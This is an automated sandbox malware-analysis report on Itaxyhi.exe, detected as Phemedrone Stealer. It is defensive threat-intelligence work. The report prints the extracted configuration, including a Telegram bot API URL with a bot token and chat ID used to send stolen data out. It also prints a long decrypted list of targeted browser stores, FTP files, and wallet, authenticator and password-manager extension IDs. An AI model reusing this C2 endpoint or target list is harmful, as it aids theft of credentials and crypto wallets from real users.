Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Itaxyhi.exe

Overview

General Information

Sample name:Itaxyhi.exe
Analysis ID:1572892
MD5:78c586522f986994aa77c466c9d678a8
SHA1:4b9b13c3782ae532a140a33ba673dc65a37aa882
SHA256:498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9
Tags:exeuser-lontze7
Infos:

Detection

Phemedrone Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
Yara detected Telegram RAT
.NET source code references suspicious native API functions
AI detected suspicious sample
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • Itaxyhi.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\Itaxyhi.exe" MD5: 78C586522F986994AA77C466C9D678A8)
  • cleanup

Malware Configuration

Threatname: Phemedrone Stealer

{"C2 url": "https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendMessage?chat_id=7235624286", "Botnet": "Default", "Tag": "Itaxyhi", "RSA Key": "<?xml version=\"1.0\" ?>\r\n<RSAParameters xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n  <Exponent>AQAB</Exponent>\r\n  <Modulus>lcxyXmt8fdbjh92+uk/0LsBudoiTsIlP6MrwR4ojh2qcobQ+tbyJTPfK7unCHlHSPQpaFMCEAH8llB2KDNdl0Ynkw00bAeg9596b5eOgynVeqs9M3qOjCAKQJaHqWq/oKwHkVoxVa5wrr91eTDNw8y4PTO0rDEDiNbAnDs8F6wk=</Modulus>\r\n</RSAParameters>"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendMessage"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
    00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
      00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
        00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
          00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
            Click to see the 5 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: Itaxyhi.exeMalware Configuration Extractor: Phemedrone Stealer {"C2 url": "https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendMessage?chat_id=7235624286", "Botnet": "Default", "Tag": "Itaxyhi", "RSA Key": "<?xml version=\"1.0\" ?>\r\n<RSAParameters xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n <Exponent>AQAB</Exponent>\r\n <Modulus>lcxyXmt8fdbjh92+uk/0LsBudoiTsIlP6MrwR4ojh2qcobQ+tbyJTPfK7unCHlHSPQpaFMCEAH8llB2KDNdl0Ynkw00bAeg9596b5eOgynVeqs9M3qOjCAKQJaHqWq/oKwHkVoxVa5wrr91eTDNw8y4PTO0rDEDiNbAnDs8F6wk=</Modulus>\r\n</RSAParameters>"}
            Source: Itaxyhi.exe.6504.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendMessage"}
            Multi AV Scanner detection for submitted file
            Source: Itaxyhi.exeReversingLabs: Detection: 79%
            Source: Itaxyhi.exeVirustotal: Detection: 70%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Itaxyhi.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: Itaxyhi.exeString decryptor: 7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM
            Source: Itaxyhi.exeString decryptor: 7235624286
            Source: Itaxyhi.exeString decryptor: <?xml version="1.0" ?><RSAParameters xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Exponent>AQAB</Exponent> <Modulus>lcxyXmt8fdbjh92+uk/0LsBudoiTsIlP6MrwR4ojh2qcobQ+tbyJTPfK7unCHlHSPQpaFMCEAH8llB2KDNdl0Ynkw00bAeg9596b5eOgynVeqs9M3qOjCAKQJaHqWq/oKwHkVoxVa5wrr91eTDNw8y4PTO0rDEDiNbAnDs8F6wk=</Modulus></RSAParameters>
            Source: Itaxyhi.exeString decryptor: Default
            Source: Itaxyhi.exeString decryptor: Itaxyhi
            Source: Itaxyhi.exeString decryptor: Memirybesohutifojyxifyloxaledoc
            Source: Itaxyhi.exeString decryptor: Passwords.txt
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: Messengers/Discord/Tokens.txt
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: Google Accounts/Tokens.txt
            Source: Itaxyhi.exeString decryptor: wallet.dat
            Source: Itaxyhi.exeString decryptor: Wallets/
            Source: Itaxyhi.exeString decryptor: \
            Source: Itaxyhi.exeString decryptor: Armory
            Source: Itaxyhi.exeString decryptor: Atomic
            Source: Itaxyhi.exeString decryptor: atomic\Local Storage\leveldb
            Source: Itaxyhi.exeString decryptor: Bytecoin
            Source: Itaxyhi.exeString decryptor: bytecoin
            Source: Itaxyhi.exeString decryptor: Coninomi
            Source: Itaxyhi.exeString decryptor: Coinomi\Coinomi\wallets
            Source: Itaxyhi.exeString decryptor: Jaxx
            Source: Itaxyhi.exeString decryptor: com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
            Source: Itaxyhi.exeString decryptor: Electrum
            Source: Itaxyhi.exeString decryptor: Electrum\wallets
            Source: Itaxyhi.exeString decryptor: Exodus
            Source: Itaxyhi.exeString decryptor: Exodus\exodus.wallet
            Source: Itaxyhi.exeString decryptor: Guarda
            Source: Itaxyhi.exeString decryptor: Guarda\Local Storage\leveldb
            Source: Itaxyhi.exeString decryptor: ZCash
            Source: Itaxyhi.exeString decryptor: Zcash
            Source: Itaxyhi.exeString decryptor: /
            Source: Itaxyhi.exeString decryptor: FileZilla\recentservers.xml
            Source: Itaxyhi.exeString decryptor: FileZilla\sitemanager.xml
            Source: Itaxyhi.exeString decryptor: FileZilla\
            Source: Itaxyhi.exeString decryptor: FTP/
            Source: Itaxyhi.exeString decryptor: Profiles
            Source: Itaxyhi.exeString decryptor: key3.db
            Source: Itaxyhi.exeString decryptor: key4.db
            Source: Itaxyhi.exeString decryptor: cookies.sqlite
            Source: Itaxyhi.exeString decryptor: moz_cookies
            Source: Itaxyhi.exeString decryptor: formhistory.sqlite
            Source: Itaxyhi.exeString decryptor: moz_formhistory
            Source: Itaxyhi.exeString decryptor: Browser Data/
            Source: Itaxyhi.exeString decryptor: /Cookies[
            Source: Itaxyhi.exeString decryptor: ].txt
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: /AutoFills[
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: logins.json
            Source: Itaxyhi.exeString decryptor: encryptedUsername
            Source: Itaxyhi.exeString decryptor: encryptedPassword
            Source: Itaxyhi.exeString decryptor: hostname
            Source: Itaxyhi.exeString decryptor: [^ -]
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: 1
            Source: Itaxyhi.exeString decryptor: metaData
            Source: Itaxyhi.exeString decryptor: password
            Source: Itaxyhi.exeString decryptor: 2A864886F70D010C050103
            Source: Itaxyhi.exeString decryptor: ISO-8859-1
            Source: Itaxyhi.exeString decryptor: password-check
            Source: Itaxyhi.exeString decryptor: 2A864886F70D01050D
            Source: Itaxyhi.exeString decryptor: nssPrivate
            Source: Itaxyhi.exeString decryptor: -
            Source: Itaxyhi.exeString decryptor: *.ini
            Source: Itaxyhi.exeString decryptor: global-salt
            Source: Itaxyhi.exeString decryptor: Version
            Source: Itaxyhi.exeString decryptor: User Data
            Source: Itaxyhi.exeString decryptor: 1.0.0.0
            Source: Itaxyhi.exeString decryptor: Local State
            Source: Itaxyhi.exeString decryptor: Network
            Source: Itaxyhi.exeString decryptor: Cookies
            Source: Itaxyhi.exeString decryptor: cookies
            Source: Itaxyhi.exeString decryptor: Web Data
            Source: Itaxyhi.exeString decryptor: autofill
            Source: Itaxyhi.exeString decryptor: Login Data
            Source: Itaxyhi.exeString decryptor: logins
            Source: Itaxyhi.exeString decryptor: token_service
            Source: Itaxyhi.exeString decryptor: credit_cards
            Source: Itaxyhi.exeString decryptor: Local Storage
            Source: Itaxyhi.exeString decryptor: leveldb
            Source: Itaxyhi.exeString decryptor: CreditCards.txt
            Source: Itaxyhi.exeString decryptor: Profile*
            Source: Itaxyhi.exeString decryptor: Authenticator
            Source: Itaxyhi.exeString decryptor: bhghoamapcdpbohphigoooaddinpkbai
            Source: Itaxyhi.exeString decryptor: EOS Authenticator
            Source: Itaxyhi.exeString decryptor: oeljdldpnmdbchonielidgobddffflal
            Source: Itaxyhi.exeString decryptor: BrowserPass
            Source: Itaxyhi.exeString decryptor: naepdomgkenhinolocfifgehidddafch
            Source: Itaxyhi.exeString decryptor: MYKI
            Source: Itaxyhi.exeString decryptor: bmikpgodpkclnkgmnpphehdgcimmided
            Source: Itaxyhi.exeString decryptor: Splikity
            Source: Itaxyhi.exeString decryptor: jhfjfclepacoldmjmkmdlmganfaalklb
            Source: Itaxyhi.exeString decryptor: CommonKey
            Source: Itaxyhi.exeString decryptor: chgfefjpcobfbnpmiokfjjaglahmnded
            Source: Itaxyhi.exeString decryptor: Zoho Vault
            Source: Itaxyhi.exeString decryptor: igkpcodhieompeloncfnbekccinhapdb
            Source: Itaxyhi.exeString decryptor: Norton Password Manager
            Source: Itaxyhi.exeString decryptor: admmjipmmciaobhojoghlmleefbicajg
            Source: Itaxyhi.exeString decryptor: Avira Password Manager
            Source: Itaxyhi.exeString decryptor: caljgklbbfbcjjanaijlacgncafpegll
            Source: Itaxyhi.exeString decryptor: Trezor Password Manager
            Source: Itaxyhi.exeString decryptor: imloifkgjagghnncjkhggdhalmcnfklk
            Source: Itaxyhi.exeString decryptor: MetaMask
            Source: Itaxyhi.exeString decryptor: nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: Itaxyhi.exeString decryptor: TronLink
            Source: Itaxyhi.exeString decryptor: ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: Itaxyhi.exeString decryptor: BinanceChain
            Source: Itaxyhi.exeString decryptor: fhbohimaelbohpjbbldcngcnapndodjp
            Source: Itaxyhi.exeString decryptor: Coin98
            Source: Itaxyhi.exeString decryptor: aeachknmefphepccionboohckonoeemg
            Source: Itaxyhi.exeString decryptor: iWallet
            Source: Itaxyhi.exeString decryptor: kncchdigobghenbbaddojjnnaogfppfj
            Source: Itaxyhi.exeString decryptor: Wombat
            Source: Itaxyhi.exeString decryptor: amkmjjmmflddogmhpjloimipbofnfjih
            Source: Itaxyhi.exeString decryptor: NeoLine
            Source: Itaxyhi.exeString decryptor: cphhlgmgameodnhkjdmkpanlelnlohao
            Source: Itaxyhi.exeString decryptor: Terra Station
            Source: Itaxyhi.exeString decryptor: aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: Itaxyhi.exeString decryptor: Keplr
            Source: Itaxyhi.exeString decryptor: dmkamcknogkgcdfhhbddcghachkejeap
            Source: Itaxyhi.exeString decryptor: Sollet
            Source: Itaxyhi.exeString decryptor: fhmfendgdocmcbmfikdcogofphimnkno
            Source: Itaxyhi.exeString decryptor: ICONex
            Source: Itaxyhi.exeString decryptor: flpiciilemghbmfalicajoolhkkenfel
            Source: Itaxyhi.exeString decryptor: KHC
            Source: Itaxyhi.exeString decryptor: hcflpincpppdclinealmandijcmnkbgn
            Source: Itaxyhi.exeString decryptor: TezBox
            Source: Itaxyhi.exeString decryptor: mnfifefkajgofkcjkemidiaecocnkjeh
            Source: Itaxyhi.exeString decryptor: Byone
            Source: Itaxyhi.exeString decryptor: nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: Itaxyhi.exeString decryptor: OneKey
            Source: Itaxyhi.exeString decryptor: ilbbpajmiplgpehdikmejfemfklpkmke
            Source: Itaxyhi.exeString decryptor: Trust Wallets
            Source: Itaxyhi.exeString decryptor: pknlccmneadmjbkollckpblgaaabameg
            Source: Itaxyhi.exeString decryptor: MetaWallet
            Source: Itaxyhi.exeString decryptor: pfknkoocfefiocadajpngdknmkjgakdg
            Source: Itaxyhi.exeString decryptor: Guarda Wallet
            Source: Itaxyhi.exeString decryptor: fcglfhcjfpkgdppjbglknafgfffkelnm
            Source: Itaxyhi.exeString decryptor: idkppnahnmmggbmfkjhiakkbkdpnmnon
            Source: Itaxyhi.exeString decryptor: JaxxxLiberty
            Source: Itaxyhi.exeString decryptor: mhonjhhcgphdphdjcdoeodfdliikapmj
            Source: Itaxyhi.exeString decryptor: Atomic Wallet
            Source: Itaxyhi.exeString decryptor: bhmlbgebokamljgnceonbncdofmmkedg
            Source: Itaxyhi.exeString decryptor: hieplnfojfccegoloniefimmbfjdgcgp
            Source: Itaxyhi.exeString decryptor: Mycelium
            Source: Itaxyhi.exeString decryptor: pidhddgciaponoajdngciiemcflpnnbg
            Source: Itaxyhi.exeString decryptor: Coinomi
            Source: Itaxyhi.exeString decryptor: blbpgcogcoohhngdjafgpoagcilicpjh
            Source: Itaxyhi.exeString decryptor: GreenAddress
            Source: Itaxyhi.exeString decryptor: gflpckpfdgcagnbdfafmibcmkadnlhpj
            Source: Itaxyhi.exeString decryptor: Edge
            Source: Itaxyhi.exeString decryptor: doljkehcfhidippihgakcihcmnknlphh
            Source: Itaxyhi.exeString decryptor: BRD
            Source: Itaxyhi.exeString decryptor: nbokbjkelpmlgflobbohapifnnenbjlh
            Source: Itaxyhi.exeString decryptor: Samourai Wallet
            Source: Itaxyhi.exeString decryptor: apjdnokplgcjkejimjdfjnhmjlbpgkdi
            Source: Itaxyhi.exeString decryptor: Copay
            Source: Itaxyhi.exeString decryptor: ieedgmmkpkbiblijbbldefkomatsuahh
            Source: Itaxyhi.exeString decryptor: Bread
            Source: Itaxyhi.exeString decryptor: jifanbgejlbcmhbbdbnfbfnlmbomjedj
            Source: Itaxyhi.exeString decryptor: KeepKey
            Source: Itaxyhi.exeString decryptor: dojmlmceifkfgkgeejemfciibjehhdcl
            Source: Itaxyhi.exeString decryptor: Trezor
            Source: Itaxyhi.exeString decryptor: jpxupxjxheguvfyhfhahqvxvyqthiryh
            Source: Itaxyhi.exeString decryptor: Ledger Live
            Source: Itaxyhi.exeString decryptor: pfkcfdjnlfjcmkjnhcbfhfkkoflnhjln
            Source: Itaxyhi.exeString decryptor: Ledger Wallet
            Source: Itaxyhi.exeString decryptor: hbpfjlflhnmkddbjdchbbifhllgmmhnm
            Source: Itaxyhi.exeString decryptor: Bitbox
            Source: Itaxyhi.exeString decryptor: ocmfilhakdbncmojmlbagpkjfbmeinbd
            Source: Itaxyhi.exeString decryptor: Digital Bitbox
            Source: Itaxyhi.exeString decryptor: dbhklojmlkgmpihhdooibnmidfpeaing
            Source: Itaxyhi.exeString decryptor: YubiKey
            Source: Itaxyhi.exeString decryptor: mammpjaaoinfelloncbbpomjcihbkmmc
            Source: Itaxyhi.exeString decryptor: Google Authenticator
            Source: Itaxyhi.exeString decryptor: khcodhlfkpmhibicdjjblnkgimdepgnd
            Source: Itaxyhi.exeString decryptor: Microsoft Authenticator
            Source: Itaxyhi.exeString decryptor: bfbdnbpibgndpjfhonkflpkijfapmomn
            Source: Itaxyhi.exeString decryptor: Authy
            Source: Itaxyhi.exeString decryptor: gjffdbjndmcafeoehgdldobgjmlepcal
            Source: Itaxyhi.exeString decryptor: Duo Mobile
            Source: Itaxyhi.exeString decryptor: eidlicjlkaiefdbgmdepmmicpbggmhoj
            Source: Itaxyhi.exeString decryptor: OTP Auth
            Source: Itaxyhi.exeString decryptor: bobfejfdlhnabgglompioclndjejolch
            Source: Itaxyhi.exeString decryptor: FreeOTP
            Source: Itaxyhi.exeString decryptor: elokfmmmjbadpgdjmgglocapdckdcpkn
            Source: Itaxyhi.exeString decryptor: Aegis Authenticator
            Source: Itaxyhi.exeString decryptor: ppdjlkfkedmidmclhakfncpfdmdgmjpm
            Source: Itaxyhi.exeString decryptor: LastPass Authenticator
            Source: Itaxyhi.exeString decryptor: cfoajccjibkjhbdjnpkbananbejpkkjb
            Source: Itaxyhi.exeString decryptor: Dashlane
            Source: Itaxyhi.exeString decryptor: flikjlpgnpcjdienoojmgliechmmheek
            Source: Itaxyhi.exeString decryptor: Keeper
            Source: Itaxyhi.exeString decryptor: gofhklgdnbnpcdigdgkgfobhhghjmmkj
            Source: Itaxyhi.exeString decryptor: RoboForm
            Source: Itaxyhi.exeString decryptor: hppmchachflomkejbhofobganapojjol
            Source: Itaxyhi.exeString decryptor: KeePass
            Source: Itaxyhi.exeString decryptor: lbfeahdfdkibininjgejjgpdafeopflb
            Source: Itaxyhi.exeString decryptor: KeePassXC
            Source: Itaxyhi.exeString decryptor: kgeohlebpjgcfiidfhhdlnnkhefajmca
            Source: Itaxyhi.exeString decryptor: Bitwarden
            Source: Itaxyhi.exeString decryptor: inljaljiffkdgmlndjkdiepghpolcpki
            Source: Itaxyhi.exeString decryptor: NordPass
            Source: Itaxyhi.exeString decryptor: njgnlkhcjgmjfnfahdmfkalpjcneebpl
            Source: Itaxyhi.exeString decryptor: LastPass
            Source: Itaxyhi.exeString decryptor: gabedfkgnbglfbnplfpjddgfnbibkmbb
            Source: Itaxyhi.exeString decryptor: Nifty Wallet
            Source: Itaxyhi.exeString decryptor: jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: Itaxyhi.exeString decryptor: Math Wallet
            Source: Itaxyhi.exeString decryptor: afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: Itaxyhi.exeString decryptor: Coinbase Wallet
            Source: Itaxyhi.exeString decryptor: hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: Itaxyhi.exeString decryptor: Equal Wallet
            Source: Itaxyhi.exeString decryptor: blnieiiffboillknjnepogjhkgnoac
            Source: Itaxyhi.exeString decryptor: EVER Wallet
            Source: Itaxyhi.exeString decryptor: cgeeodpfagjceefieflmdfphplkenlfk
            Source: Itaxyhi.exeString decryptor: Jaxx Liberty
            Source: Itaxyhi.exeString decryptor: ocefimbphcgjaahbclemolcmkeanoagc
            Source: Itaxyhi.exeString decryptor: BitApp Wallet
            Source: Itaxyhi.exeString decryptor: fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: Itaxyhi.exeString decryptor: Mew CX
            Source: Itaxyhi.exeString decryptor: nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: Itaxyhi.exeString decryptor: GU Wallet
            Source: Itaxyhi.exeString decryptor: nfinomegcaccbhchhgflladpfbajihdf
            Source: Itaxyhi.exeString decryptor: Guild Wallet
            Source: Itaxyhi.exeString decryptor: nanjmdkhkinifnkgdeggcnhdaammmj
            Source: Itaxyhi.exeString decryptor: Saturn Wallet
            Source: Itaxyhi.exeString decryptor: nkddgncdjgifcddamgcmfnlhccnimig
            Source: Itaxyhi.exeString decryptor: Harmony Wallet
            Source: Itaxyhi.exeString decryptor: fnnegphlobjdpkhecapkijjdkgcjhkib
            Source: Itaxyhi.exeString decryptor: TON Wallet
            Source: Itaxyhi.exeString decryptor: nphplpgoakhhjchkkhmiggakijnkhfnd
            Source: Itaxyhi.exeString decryptor: OpenMask Wallet
            Source: Itaxyhi.exeString decryptor: penjlddjkjgpnkllboccdgccekpkcbin
            Source: Itaxyhi.exeString decryptor: MyTonWallet
            Source: Itaxyhi.exeString decryptor: fldfpgipfncgndfolcbkdeeknbbbnhcc
            Source: Itaxyhi.exeString decryptor: DeWallet
            Source: Itaxyhi.exeString decryptor: pnccjgokhbnggghddhahcnaopgeipafg
            Source: Itaxyhi.exeString decryptor: TrustWallet
            Source: Itaxyhi.exeString decryptor: egjidjbpglichdcondbcbdnbeeppgdph
            Source: Itaxyhi.exeString decryptor: NC Wallet
            Source: Itaxyhi.exeString decryptor: imlcamfeniaidioeflifonfjeeppblda
            Source: Itaxyhi.exeString decryptor: Moso Wallet
            Source: Itaxyhi.exeString decryptor: ajkifnllfhikkjbjopkhmjoieikeihjb
            Source: Itaxyhi.exeString decryptor: Enkrypt Wallet
            Source: Itaxyhi.exeString decryptor: kkpllkodjeloidieedojogacfhpaihoh
            Source: Itaxyhi.exeString decryptor: CirusWeb3 Wallet
            Source: Itaxyhi.exeString decryptor: kgdijkcfiglijhaglibaidbipiejjfdp
            Source: Itaxyhi.exeString decryptor: Martian and Sui Wallet
            Source: Itaxyhi.exeString decryptor: efbglgofoippbgcjepnhiblaibcnclgk
            Source: Itaxyhi.exeString decryptor: SubWallet
            Source: Itaxyhi.exeString decryptor: onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: Itaxyhi.exeString decryptor: Pontem Wallet
            Source: Itaxyhi.exeString decryptor: phkbamefinggmakgklpkljjmgibohnba
            Source: Itaxyhi.exeString decryptor: Talisman Wallet
            Source: Itaxyhi.exeString decryptor: fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: Itaxyhi.exeString decryptor: Kardiachain Wallet
            Source: Itaxyhi.exeString decryptor: pdadjkfkgcafgbceimcpbkalnfnepbnk
            Source: Itaxyhi.exeString decryptor: Phantom Wallet
            Source: Itaxyhi.exeString decryptor: bfnaelmomeimhIpmgjnjophhpkkoljpa
            Source: Itaxyhi.exeString decryptor: Oxygen Wallet
            Source: Itaxyhi.exeString decryptor: fhilaheimglignddjgofkcbgekhenbh
            Source: Itaxyhi.exeString decryptor: PaliWallet
            Source: Itaxyhi.exeString decryptor: mgfffbidihjpoaomajlbgchddlicgpn
            Source: Itaxyhi.exeString decryptor: BoltX Wallet
            Source: Itaxyhi.exeString decryptor: aodkkagnadcbobfpggnjeongemjbjca
            Source: Itaxyhi.exeString decryptor: Liquality Wallet
            Source: Itaxyhi.exeString decryptor: kpopkelmapcoipemfendmdghnegimn
            Source: Itaxyhi.exeString decryptor: xDefi Wallet
            Source: Itaxyhi.exeString decryptor: hmeobnffcmdkdcmlb1gagmfpfboieaf
            Source: Itaxyhi.exeString decryptor: Nami Wallet
            Source: Itaxyhi.exeString decryptor: Ipfcbjknijpeeillifnkikgncikgfhdo
            Source: Itaxyhi.exeString decryptor: MaiarDeFi Wallet
            Source: Itaxyhi.exeString decryptor: dngmlblcodfobpdpecaadgfbeggfjfnm
            Source: Itaxyhi.exeString decryptor: MetaMask Edge Wallet
            Source: Itaxyhi.exeString decryptor: ejbalbakoplchlghecdalmeeeajnimhm
            Source: Itaxyhi.exeString decryptor: Goblin Wallet
            Source: Itaxyhi.exeString decryptor: mlbafbjadjidk1bhgopoamemfibcpdfi
            Source: Itaxyhi.exeString decryptor: Braavos Smart Wallet
            Source: Itaxyhi.exeString decryptor: jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: Itaxyhi.exeString decryptor: UniSat Wallet
            Source: Itaxyhi.exeString decryptor: ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: Itaxyhi.exeString decryptor: OKX Wallet
            Source: Itaxyhi.exeString decryptor: mcohilncbfahbmgdjkbpemcciiolgcge
            Source: Itaxyhi.exeString decryptor: Manta Wallet
            Source: Itaxyhi.exeString decryptor: enabgbdfcbaehmbigakijjabdpdnimlg
            Source: Itaxyhi.exeString decryptor: Suku Wallet
            Source: Itaxyhi.exeString decryptor: fopmedgnkfpebgllppeddmmochcookhc
            Source: Itaxyhi.exeString decryptor: Suiet Wallet
            Source: Itaxyhi.exeString decryptor: khpkpbbcccdmmclmpigdgddabeilkdpd
            Source: Itaxyhi.exeString decryptor: Koala Wallet
            Source: Itaxyhi.exeString decryptor: lnnnmfcpbkafcpgdilckhmhbkkbpkmid
            Source: Itaxyhi.exeString decryptor: ExodusWeb3 Wallet
            Source: Itaxyhi.exeString decryptor: aholpfdialjgjfhomihkjbmgjidlcdno
            Source: Itaxyhi.exeString decryptor: Aurox Wallet
            Source: Itaxyhi.exeString decryptor: kilnpioakcdndlodeeceffgjdpojajlo
            Source: Itaxyhi.exeString decryptor: Fewcha Move Wallet
            Source: Itaxyhi.exeString decryptor: ebfidpplhabeedpnhjnobghokpiioolj
            Source: Itaxyhi.exeString decryptor: Carax Demon Wallet
            Source: Itaxyhi.exeString decryptor: mdjmfdffdcmnoblignmgpommbefadffd
            Source: Itaxyhi.exeString decryptor: Leap Terra Wallet
            Source: Itaxyhi.exeString decryptor: aijcbedoijmgnlmjeegjaglmepbmpkpi
            Source: Itaxyhi.exeString decryptor: Local Extension Settings
            Source: Itaxyhi.exeString decryptor: Extensions/
            Source: Itaxyhi.exeString decryptor: [
            Source: Itaxyhi.exeString decryptor: ]/
            Source: Itaxyhi.exeString decryptor: Module Info Cache
            Source: Itaxyhi.exeString decryptor: Last Version
            Source: Itaxyhi.exeString decryptor: .
            Source: Itaxyhi.exeString decryptor: *cord*
            Source: Itaxyhi.exeString decryptor: FileGrabber
            Source: Itaxyhi.exeString decryptor: ,d88b.d88b, 88888888888 Phemedrone Stealer `Y8888888Y' {0:dd/MM/yyyy HH:mm:ss} `Y888Y' Developed by https://t.me/webster480 & https://t.me/TheDyer `Y' Tag: {1} ----- Geolocation Data -----{2,-25}{3}{4,-25}{5} ({6}){7,-25}{8}{9,-25}{10}{11,-25}{12} ----- Hardware Info -----{13,-25}{14}\{15} {16,-25}{17} {18}{19,-25}{20}{21,-25}{22}{23,-25}{24}{25,-25}{26}{27,-25}{28} GB ----- Report Contents -----{29,-25}{30}{31,-25}{32}{33,-25}{34}{35,-25}{36}{37,-25}{38}{39,-25}{40}{41,-25}{42}{43}{44} ----- Miscellaneous -----{45,-25}{46}{47,-25}{48}
            Source: Itaxyhi.exeString decryptor: IP:
            Source: Itaxyhi.exeString decryptor: ip
            Source: Itaxyhi.exeString decryptor: Country:
            Source: Itaxyhi.exeString decryptor: country
            Source: Itaxyhi.exeString decryptor: country_code
            Source: Itaxyhi.exeString decryptor: City:
            Source: Itaxyhi.exeString decryptor: city
            Source: Itaxyhi.exeString decryptor: Postal:
            Source: Itaxyhi.exeString decryptor: asn
            Source: Itaxyhi.exeString decryptor: MAC:
            Source: Itaxyhi.exeString decryptor: Username:
            Source: Itaxyhi.exeString decryptor: Windows name:
            Source: Itaxyhi.exeString decryptor: x32
            Source: Itaxyhi.exeString decryptor: x64
            Source: Itaxyhi.exeString decryptor: Hardware ID:
            Source: Itaxyhi.exeString decryptor: Screen Resolution:
            Source: Itaxyhi.exeString decryptor: GPU:
            Source: Itaxyhi.exeString decryptor: {0,-25}
            Source: Itaxyhi.exeString decryptor: CPU:
            Source: Itaxyhi.exeString decryptor: RAM:
            Source: Itaxyhi.exeString decryptor: Passwords:
            Source: Itaxyhi.exeString decryptor: Cookies:
            Source: Itaxyhi.exeString decryptor: Credit Cards:
            Source: Itaxyhi.exeString decryptor: AutoFills:
            Source: Itaxyhi.exeString decryptor: Extensions:
            Source: Itaxyhi.exeString decryptor: Wallets:
            Source: Itaxyhi.exeString decryptor: Files:
            Source: Itaxyhi.exeString decryptor: {0,-25}{1}
            Source: Itaxyhi.exeString decryptor: Passwords Tags:
            Source: Itaxyhi.exeString decryptor: ,
            Source: Itaxyhi.exeString decryptor: Cookies Tags:
            Source: Itaxyhi.exeString decryptor: Antivirus products:
            Source: Itaxyhi.exeString decryptor: File Location:
            Source: Itaxyhi.exeString decryptor: unknown
            Source: Itaxyhi.exeString decryptor: Information.txt
            Source: Itaxyhi.exeString decryptor: *Phemedrone Stealer Report* \| by @webster480 & @TheDyer``` - IP: {0} \({1}\) - Tag: {2} {3} - Passwords: {4} - Cookies: {5} - Wallets: {6}```{7}{8}@freakcodingspot
